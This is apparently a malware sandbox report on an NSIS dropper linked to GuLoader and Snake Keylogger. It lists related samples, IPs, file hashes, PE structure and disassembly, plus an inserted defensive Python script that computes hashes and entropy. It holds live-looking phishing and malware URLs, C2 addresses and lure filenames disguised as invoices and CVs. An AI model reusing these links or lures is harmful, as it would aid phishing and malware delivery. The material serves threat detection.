Request for Quotation MK FMHS.RFQ.24.11.07.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
ungziped_file.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
Snurrevoddenes.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 188.114.96.3
Eksistensberettigelsernes102.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 188.114.97.3
ALI HASSO - P02515 & P02518.exe | malicious | GuLoader, Snake Keylogger | 104.21.67.152
Order&picture sample8398398392838PDF.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
https://login.ocsgroup.com.mx/global/employee?user_id=DoFjJTOXrEySD0w_AN5X5CnN_jKgmQ-62fmUaqLwe1mjA5n_sht8bM4gHHi97AmLcwpN7hYmIxQBjkE9CyfZa5CdVasJGlMIE2D58io | malicious | HTMLPhisher | 104.18.95.41
file.exe | malicious | Amadey, Stealc, Vidar | 172.64.41.3
https://secure_sharing0documentpreview.wesendit.com/dl/UXseZ6Oj8WT8cWxHq/bXVoYW1hZC5hZGkubXVxcmlAc2ltZWRhcmJ5LmNvbQ | malicious | Unknown | 104.21.30.157
file.exe | malicious | LummaC | 104.21.80.55
file.exe | malicious | Amadey, Stealc, Vidar | 172.64.41.3
https://sv-management.solarflevoland.nl/wix | malicious | Unknown | 104.16.124.96
Match: ORACLE-BMC-31898US
Associated Sample Name / URL | Detection | Threat Name | Context
Snurrevoddenes.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 193.122.6.168
HALKBANK.pdf.exe | malicious | Snake Keylogger | 193.122.130.0
1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
Curriculum Vitae Estrella Torres.exe | malicious | Snake Keylogger | 158.101.44.242
Factura Honorarios 2024-11-04.exe | malicious | GuLoader, Snake Keylogger | 193.122.130.0
sora.mips.elf | malicious | Mirai | 152.67.126.107
CkHXjQGPA5.exe | malicious | Snake Keylogger | 193.122.6.168
QNiXvaE3ps.exe | malicious | Snake Keylogger | 158.101.44.242
Ref#130709.vbe | malicious | MassLogger RAT | 193.122.6.168
hesaphareketi-01.exe | malicious | Snake Keylogger | 193.122.6.168
Match: 54328bd36c14bd82ddaa0c04b25ed9ad
Associated Sample Name / URL | Detection | Threat Name | Context
Snurrevoddenes.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 188.114.96.3
Eksistensberettigelsernes102.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 188.114.96.3
ALI HASSO - P02515 & P02518.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
Order&picture sample8398398392838PDF.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
HALKBANK.pdf.exe | malicious | Snake Keylogger | 188.114.96.3
Setup.exe | malicious | Unknown | 188.114.96.3
1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
Curriculum Vitae Estrella Torres.exe | malicious | Snake Keylogger | 188.114.96.3
Factura Honorarios 2024-11-04.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
CERTIFICADO TITULARIDAD.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3

Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
Snurrevoddenes.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
Eksistensberettigelsernes102.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
ALI HASSO - P02515 & P02518.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
Order&picture sample8398398392838PDF.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 149.154.167.220
https://u34251876.ct.sendgrid.net/ls/click?upn=u001.ordJ57g0HVndDa8Km-2BVUUFN1eIn5tdzIxrKbgsGfF9eVdl7b-2Fab-2BrUBdfIXH9yijR5LLM7kgivkgUI3nC3VajM00UDrq4ekI2XREqo0QmHcHyDyYWomvx9-2FHEtQ3o5rBM9AHzVSsjnwFSEJqic-2BEtw-3D-3DBxNa_qINdfz5Lp8EahgxJXfgGV-2Bk7caEgTUs2gtUTKNMgBkZ9mbVIMd-2B1UUN0TqdRRGrocW81C18onNWNx5Y6KM88Rr7odKCqMhALUPuUbXGlkOo01sEKeKdphXRhykHXKfSB-2By1s-2BNAgCL9-2BbtY8LNaKNV0sXQnlv-2F9fA-2BLZtaeadaVGHb32bFHhcOwS3ltfr2dig92MY6M8DrwwYiolgI1k4Q-3D-3D | malicious | Unknown | 149.154.167.220
1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
AdobePDQ5.6.1.msi | malicious | Unknown | 149.154.167.220
https://vinculocomputer.com/run/ | malicious | Unknown | 149.154.167.220
AdobeViewerPDQ5.5.msi | malicious | Unknown | 149.154.167.220
Match: C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll
Associated Sample Name / URL | Detection | Threat Name | Context
Snurrevoddenes.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
Eksistensberettigelsernes102.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
ALI HASSO - P02515 & P02518.exe | malicious | GuLoader, Snake Keylogger |
PRICE ENQUIRY - RFQ 6000073650.exe | malicious | GuLoader |
PRICE ENQUIRY - RFQ 6000073650.exe | malicious | Azorult, GuLoader |
Factura Honorarios 2024-10.exe | malicious | GuLoader, Snake Keylogger |
Shipping documents 00039984849900044800.exe | malicious | AgentTesla, GuLoader |
Fa24c148.exe | malicious | GuLoader, Snake Keylogger |
rFa24c148.exe | malicious | GuLoader, Snake Keylogger |
Remittance Copy For Advance Payment PO _PDF.exe | malicious | FormBook, GuLoader |
Process: C:\Users\user\Desktop\________.exe
File Type: data
Category: dropped
Size (bytes): 2218188
Entropy (8bit): 2.986726085961109
Encrypted: false
SSDEEP: 12288:8W6Gb40pbjQAl/O9uVl3T+lo65mFvCb/fSQd8rRd:8W6GsAjQ2mYV905evY/6Rf
MD5: 96D283A2382E1FB51AFB38BA1E81E26C
SHA1: FA0CDB7DE06897D81D6DF6463883E72FD73F63F7
SHA-256: 4AB5BD9941534EC0F4EB155FF57002632A69C75D5BB602C13132A3D23D5BA07B
SHA-512: 4157227C87ABBABAB23A68F6DE472FDAC1A582BD96E7A7604520F1B7C70A994B586324EFD41F2AE83E087E5D667A9035042CCEA40F500F0AB1CA8F83FCAD1A9E
Malicious: false
Reputation: low
                                                                                                                                                Preview:.B......,.......,.......D...............:A......8B..........................................................................................................................................................................................................................................G...J...............h...............................................................g...............................................................j...............................................................................................................................+...........;...........................................................................................................................................................................................................................................................................................................................................................................................................................................
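The File Type, Entropy (8bit), digest and Preview fields of a dropped-file record are cheap to reproduce on the analyst side, which matters when a file recovered from a host has to be matched against the hashes a report lists, or when a blob's entropy is the only hint that it is a packed or encrypted payload. The Python below is an added example written for this page, not Joe Sandbox's own implementation: it computes the same four digests and the 8-bit Shannon entropy, classifies a blob as PE32 / PE32+ executable or DLL versus data from its DOS and COFF headers (subsystem and the "for MS Windows" suffix are not examined), and renders a Preview in the report's style. The 7.2 bits-per-byte cutoff for "Encrypted" and the header-only PE image it builds as sample input are assumptions constructed for the demonstration.

```python
import hashlib
import math
import struct
from collections import Counter

# Assumed cutoff (bits per byte) above which this example labels a blob "Encrypted: true".
# It is an assumption for the demonstration, not the sandbox's own threshold.
HIGH_ENTROPY_THRESHOLD = 7.2

IMAGE_FILE_DLL = 0x2000            # COFF Characteristics flag
IMAGE_FILE_MACHINE_I386 = 0x014C   # reported as "Intel 80386"
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B   # optional-header magic


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a single repeated byte, 8.0 for a uniform
    byte distribution. This is what the 'Entropy (8bit)' field reports."""
    if not data:
        return 0.0
    counts = Counter(data)
    if len(counts) == 1:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def digest_set(data: bytes) -> dict:
    """MD5, SHA1, SHA-256 and SHA-512 in upper-case hex, as the report prints them."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def preview(data: bytes, length: int = 64) -> str:
    """Printable ASCII is kept, every other byte becomes '.', like the 'Preview' field."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:length])


def pe_file_type(data: bytes) -> str:
    """Classify a blob from its DOS/COFF/optional headers, e.g. 'data',
    'PE32 executable Intel 80386' or 'PE32 executable (DLL) Intel 80386'.
    Subsystem (GUI/console) is not examined, so that part of the report's string is omitted."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "data"
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # Need the 4-byte signature, the 20-byte COFF header and the 2-byte optional-header magic.
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "data"
    # COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, _, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0] if opt_size >= 2 else 0
    fmt = {PE32_MAGIC: "PE32", PE32PLUS_MAGIC: "PE32+"}.get(magic)
    if fmt is None:
        return "data"
    arch = {IMAGE_FILE_MACHINE_I386: "Intel 80386", IMAGE_FILE_MACHINE_AMD64: "x86-64"}.get(
        machine, f"machine 0x{machine:04X}")
    kind = "executable (DLL)" if characteristics & IMAGE_FILE_DLL else "executable"
    return f"{fmt} {kind} {arch}"


def describe_dropped_file(data: bytes) -> dict:
    """Build a record with the same fields the report shows for a dropped file."""
    entropy = shannon_entropy_8bit(data)
    record = {
        "File Type": pe_file_type(data),
        "Size (bytes)": len(data),
        "Entropy (8bit)": entropy,
        "Encrypted": entropy >= HIGH_ENTROPY_THRESHOLD,
    }
    record.update(digest_set(data))
    record["Preview"] = preview(data)
    return record


def build_minimal_pe(dll: bool, machine: int = IMAGE_FILE_MACHINE_I386) -> bytes:
    """Constructed, header-only PE image used as sample input (it is not loadable)."""
    e_lfanew = 0x40
    img = bytearray(b"MZ").ljust(0x3C, b"\0")          # DOS header up to e_lfanew
    img += struct.pack("<I", e_lfanew)
    img += b"PE\0\0"
    characteristics = 0x0102 | (IMAGE_FILE_DLL if dll else 0)   # EXECUTABLE_IMAGE | 32BIT_MACHINE
    img += struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 2, characteristics)
    img += struct.pack("<H", PE32_MAGIC)
    return bytes(img)


if __name__ == "__main__":
    for label, blob in [("header-only dll", build_minimal_pe(dll=True)),
                        ("zero-filled", b"\0" * 4096),
                        ("uniform bytes", bytes(range(256)) * 16)]:
        print(label, describe_dropped_file(blob))
```

Run it against a real dropped file with `describe_dropped_file(open(path, "rb").read())` and compare the digests with the record; an entropy near 8.0 on a blob the report calls "data" is the usual sign of an encrypted second stage, while an NSIS plugin DLL such as a System.dll sits well below the cutoff.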
Process: C:\Users\user\Desktop\________.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11264
Entropy (8bit): 5.801108840712148
Encrypted: false
SSDEEP: 192:e/b2HS5ih/7i00eWz9T7PH6yeFcQMI5+Vw+EXWZ77dslFZk:ewSUmWw9T7MmnI5+/F7Kdk
MD5: FC90DFB694D0E17B013D6F818BCE41B0
SHA1: 3243969886D640AF3BFA442728B9F0DFF9D5F5B0
SHA-256: 7FE77CA13121A113C59630A3DBA0C8AAA6372E8082393274DA8F8608C4CE4528
SHA-512: 324F13AA7A33C6408E2A57C3484D1691ECEE7C3C1366DE2BB8978C8DC66B18425D8CAB5A32D1702C13C43703E36148A022263DE7166AFDCE141DA2B01169F1C6
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Snurrevoddenes.exe, Detection: malicious
• Filename: Eksistensberettigelsernes102.exe, Detection: malicious
• Filename: ALI HASSO - P02515 & P02518.exe, Detection: malicious
• Filename: PRICE ENQUIRY - RFQ 6000073650.exe, Detection: malicious
• Filename: PRICE ENQUIRY - RFQ 6000073650.exe, Detection: malicious
• Filename: Factura Honorarios 2024-10.exe, Detection: malicious
• Filename: Shipping documents 00039984849900044800.exe, Detection: malicious
• Filename: Fa24c148.exe, Detection: malicious
• Filename: rFa24c148.exe, Detection: malicious
                                                                                                                                                • Filename: Remittance Copy For Advance Payment PO _PDF.exe, Detection: malicious, Browse
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....oS...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..>....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\________.exe
File Type:data
Category:dropped
Size (bytes):243457
Entropy (8bit):1.2556862555304324
Encrypted:false
SSDEEP:768:BObeQfxNU+OmdH9zR+FY73WLYZLbReg24pPjHp5IIHLP96H7ub2g9zEQyhOrqjUC:EfpiYZgCO4zTJJEQ56XsZ3W
MD5:2C2AECA05F67661A0A6798FD3DA68257
SHA1:43140C33EE2A2C3B729CFDE53AD2A7E4D2436BBB
SHA-256:568B8DEE1985CEAFE404B08549F7363DD53A667C7A2BDF80CA8C57BA7ED9FDA0
SHA-512:F833EF465CFDB410BE15E2D647DFFA91C3787D19E6155B7F33F2A3127368A20C35B15442AA9C5FE5953E85DCA80DB843E530705AC22E5A19ABDB604EF85EC81C
Malicious:false
Reputation:low
Preview:................................K............H.......................................#............,..............................................................................g..........................>...................3..............................P.../......................-................'.........................H...........................................................G...................................................g..................B.....'.....................>....................................v.........................................:.....................................S..............................._.............................................y.......................................E.......i.............................!...........M..X.......................................................{...$..............................g.....[.........................................=.................7..............-...............................................g.......

Process:C:\Users\user\Desktop\________.exe
File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 36028797018963968.000000
Category:dropped
Size (bytes):370481
Entropy (8bit):1.2536250775230349
Encrypted:false
SSDEEP:1536:KsTb+NlXRBRrADr1ILH0FvruLfYOL3u4cF:rCNRRsY0FDSQaQ
MD5:0D9A1AE53B3662ECA9655EF20BB4E0CE
SHA1:CA647617571F73E4FF815AC7DB91F3FF4BF170A6
SHA-256:033C22A52C94A106582A33B0C267681B6A4EE7D668E4AA7DA9BD9D0DF05DEA1F
SHA-512:CF89E8EE9AFB4491890D8AF3FE2F7B855C41B68DEE9746155E1E05CC0B91B390D69C0DF905FDE22E9F3580241A57B1A5050903AC32F2695AB5F6485ACB5161E8
Malicious:false
Reputation:low
Preview:...~........................................x......H..........S..........d............................................................................................................m...............................R.....w...........V.........Z.................b......>........................:..................................................................................................................j..................3..b.....................*.......................P...............................................................#............<.......................................0...a........C......_..........................................................................p..{..........................K.......I.......................E..................&...................................... ............q..........+........................|..................................e.......a..........tQ............I/.........K......................T........................................

Process:C:\Users\user\Desktop\________.exe
File Type:ASCII text, with very long lines (401), with CRLF line terminators
Category:dropped
Size (bytes):403
Entropy (8bit):4.236334007211441
Encrypted:false
SSDEEP:12:NRkE9FLJJzKZl6O8oMOvusjy7TVLt09BQiux:N7nLjG8oM6jMp093ux
MD5:F9E44960FAD1DE9A72E38ED010895F2E
SHA1:56742A285F6AF1D49A3C57941D7562B58601E072
SHA-256:73F4D5E40CB4BBF5C59C41C8CDDB8F9F7D320470538716B66AA7796EDDB7C6C8
SHA-512:A7642172F96CFA0C3BFDB34FA575C40BD7ECD88C43DD4DF3354AAC3A0F7C6C8709B42AC88838CD5CBB4B3AF32BB48B6A9D1D2EB77C5F55295A88876B271EF1FA
Malicious:false
Reputation:low
Preview:milvago spiralfjedrenes cushier.decine myggesvrmenes deorganization.giannulas poser kloners sammenhfter femoghalvtreds abettals peripatopsidae.tetradic stoppegarner hjemgivelsen masseorganisation lanx,heddinge kricketen symptomer kinas societism avanti tropistic.sarandon mesonyx sangskriveren biblioskopernes tangram zarebas friordningen bygningsingenirs ventilationernes bambusmaattens signatarmagts..

Process:C:\Users\user\Desktop\________.exe
File Type:data
Category:dropped
Size (bytes):456900
Entropy (8bit):6.95283114468952
Encrypted:false
SSDEEP:6144:lBahjMqcVGbP4t0p20jQAdX/O9u3zZERyl3BOg16nXVo65mB:DW6Gb40pbjQAl/O9uVl3T+lo65mB
MD5:12C496943A29DCF170BDE98D58822B0E
SHA1:CEF5BAF827A17A114C4B7F40F648B8F32DDF38FD
SHA-256:8974424451EF540534850E0EFE2D71E8E40A4669E43337E8FB1DBEDEAB46C7AE
SHA-512:29F9428F5F50E665070474715F6E7ACD9DA5267B459779AFDA0F4B8FF3E72EB9604E49C9B47F076E5F69DD8BAC75D398180F38AE0824F4EA863F4A73EB9E6B2D
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\________.exe
File Type:data
Category:dropped
Size (bytes):424812
Entropy (8bit):1.2532745203430722
Encrypted:false
SSDEEP:768:zQN1zNkWceUPEvf5mtuQTyT0Vupr6jgDTslr7WSn3Dpbvj33BIUaE6SKCBLnSOXQ:6GkbAmorbpf6nP6e6RlY8R2KNsyB
MD5:A8D5999B820E9BA7EC8AE02AC64BD740
SHA1:162064D1816D6723954401E5FF406FB815B1FF01
SHA-256:F3F32F4EE9A9CF103B9E6876518F46801AA187864024B28DE7F36AB7A1A00B7F
SHA-512:6D4DC54EA8653AF4D088E8B058ED07F25F8E2B92571C688BDEBF32759DA813C34A3D5B9BCB1095619C67B5797B2881B2F227B8EA592BDCCB3870B1E8A40E1312
Malicious:false
Preview:......2.t................................................#................................(.................................C..(..................$.........................................................y................................................................................[...x.........................>................W.....................................................T....a........................................................H..................u...p.....!.............................................................................................q.....H.........l..K...............`..........R........................f..............................................................+......\.................V......................o.....C.....}...........l..........&............0........ ..n.......O....*.............q............|............................*.........................._....9.......3....I.........G..............................................................

Process:C:\Users\user\Desktop\________.exe
File Type:data
Category:dropped
Size (bytes):486557
Entropy (8bit):1.2517544244225545
Encrypted:false
SSDEEP:1536:uRoqTXoly8kLiqpTbJDQAw9WGCEHBg2Ed5:2IkLfpTlDQAOL
MD5:4F7A0E04C31521449860638552DDC981
SHA1:D6FF38322926347DED812C57690D26DD6BB167A0
SHA-256:37B7F63261C13F15D9889F297B29273A7B81EB306009F466A0A4383C954F7F49
SHA-512:B5620E786B307EBF3259AE6B5AACD8E2A9B75427DAA88C6CDEBD0D0E62A5ACE6983A131F2B70E35703BEA0E3CEFD4A9B26B7706AEFBECB87F7AFAE0B38740CC9
Malicious:false
Preview:................P.............................................T....=.........yO.........t..................................W.................................=..................................................................................................................y.........................................................N.....H.................................................................................l.................,..............................]...............:....................................J...}.............................................................................$.........................................=....A....................3.........................................................................7........e...N................#...........................M........................Z....................................................j.................................L........O............................z......,.................c.........3............

Process:C:\Users\user\Desktop\________.exe
File Type:data
Category:dropped
Size (bytes):207254
Entropy (8bit):1.2604686518033184
Encrypted:false
SSDEEP:768:od51waTQFApCdHNsdUp09xiXes7NAnAC+qFvVdhVMtdubYN/UIC6mTtRzcScEfQt:hA6C9AG+alAKUcyZ9oE
MD5:43A8D782AD3A56D7ECD14E52CAEA0F41
SHA1:FCDFF92EC42BEDC2297AE1ECB3C8A009E9A900BF
SHA-256:06AB90D835D1CCFF3CFD1AE37956891918190037D989B4072B4E7ABD5B5418C6
SHA-512:6EEBAC37056096ED7C0C97EA44A4FEDB7DD54DF826171F5733FF72AE0943C6D156F66CCD8239866180AF8FC7793480EDCCACE317BE58F37BEFB12CA43A390871
Malicious:false
Preview:...........................i.......................0..........................................................................................................................!.....m..............-....................................................5..e.~........e............ .................................................U.......0{.........B.....................*.................................................................................j...........y................p.............................................................................................a.................o.............................................K.....~.....(...........................D........t.............................................................[.&...... .............................................................m..............x.......................^...........................B...'.........k.....u................L................................................................T..........

File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):7.6649956695668875
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:________.exe
File size:847'584 bytes
MD5:89b3b4723ea3983fc0f103eaf3093edc
SHA1:bb6fb38b57fd6694e0803d1de469f0a326e231f4
SHA256:69a0042174fbffed7ac840081ec1d5618f2a70fe4d56078b98a1db06627f9eab
SHA512:74befa13a84be96af3d7209113b11511dde96835c1a8a7a3453649cddf383d356a034632c58cc4778389495625fef0da894c03a75e5e04afdcf6eadc3dc947fa
SSDEEP:24576:UvYV0HT73uFztJXcrBbO3j8xa93BPapMMjC+eN3o67:POzaRcBbO3j193SLjC+ko
TLSH:C4051242F6D4816AF82A013291575F726F6364317F1C5A9B37F73B5E5830286AB3823E
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L.....oS.................`...*......Z3.......p....@
Icon Hash:4975784d4f49613b
Entrypoint:0x40335a
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x536FD79B [Sun May 11 20:03:39 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                                                                                                                Signature Valid:false
                                                                                                                                                Signature Issuer:CN=Bedyrelserne, O=Bedyrelserne, L=Digne-les-Bains, C=FR
                                                                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                Error Number:-2146762487
                                                                                                                                                Not Before, Not After
                                                                                                                                                • 29/03/2024 01:42:17 29/03/2027 02:42:17
                                                                                                                                                Subject Chain
                                                                                                                                                • CN=Bedyrelserne, O=Bedyrelserne, L=Digne-les-Bains, C=FR
                                                                                                                                                Version:3
                                                                                                                                                Thumbprint MD5:85F3BBB62036402FF36E1128FB3D8107
                                                                                                                                                Thumbprint SHA-1:8701ACC0AA00C95218234E53568933E79BEDFECE
                                                                                                                                                Thumbprint SHA-256:A551FF79E19AF7881A8BBD33B3ED54C0D737B5DADACD1E5B7BE771B27C739712
                                                                                                                                                Serial:590ECF4911EDE00D44E5D1250CB96FC4C625C4B8
Instruction (entrypoint disassembly):
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+14h], ebp
mov dword ptr [esp+10h], 00409230h
mov dword ptr [esp+1Ch], ebp
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070BCh]
push ebp
call dword ptr [004072ACh]
push 00000008h
mov dword ptr [00429298h], eax
call 00007F40ACD59B1Ch
mov dword ptr [004291E4h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 00420690h
call dword ptr [0040717Ch]
push 0040937Ch
push 004281E0h
call 00007F40ACD59787h
call dword ptr [00407134h]
mov ebx, 00434000h
push eax
push ebx
call 00007F40ACD59775h
push ebp
call dword ptr [0040710Ch]
cmp word ptr [00434000h], 0022h
mov dword ptr [004291E0h], eax
mov eax, ebx
jne 00007F40ACD56C6Ah
push 00000022h
mov eax, 00434002h
pop esi
push esi
push eax
call 00007F40ACD591C6h
push eax
call dword ptr [00407240h]
mov dword ptr [esp+18h], eax
jmp 00007F40ACD56D2Eh
push 00000020h
pop edx
cmp cx, dx
jne 00007F40ACD56C69h
inc eax
inc eax
cmp word ptr [eax], dx
je 00007F40ACD56C5Bh
add word ptr [eax], 0000h
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x28c48 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xccce8 | 0x21f8 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5e68 | 0x6000 | 2f6554958e1a5093777de617d6e0bffc | False | 0.6566162109375 | data | 6.419811957742583 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1354 | 0x1400 | 2222fe44ebbadbc32af32dfc9c88e48e | False | 0.4306640625 | data | 5.037511188789184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x202d8 | 0x600 | 9587277f9a9b39e2caf86eae07909d87 | False | 0.4733072916666667 | data | 3.757932017065988 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x29000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x53000 | 0x28c48 | 0x28e00 | 59d6061d9f9f5498351e74e1e9b8c526 | False | 0.4770761659021407 | data | 5.198121069162778 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x53400 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
RT_ICON | 0x53768 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.4562433455577901
RT_ICON | 0x63f90 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States | 0.4870191297035947
RT_ICON | 0x6d438 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736 | English | United States | 0.5106746765249538
RT_ICON | 0x728c0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.5217879074161549
RT_ICON | 0x76ae8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.5518672199170125
RT_ICON | 0x79090 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.6116322701688556
RT_ICON | 0x7a138 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | English | United States | 0.6635245901639344
RT_ICON | 0x7aac0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.7340425531914894
RT_DIALOG | 0x7af28 | 0x144 | data | English | United States | 0.5216049382716049
RT_DIALOG | 0x7b070 | 0x13c | data | English | United States | 0.5506329113924051
RT_DIALOG | 0x7b1b0 | 0x120 | data | English | United States | 0.5173611111111112
RT_DIALOG | 0x7b2d0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x7b3f0 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x7b4b8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x7b518 | 0x76 | data | English | United States | 0.7542372881355932
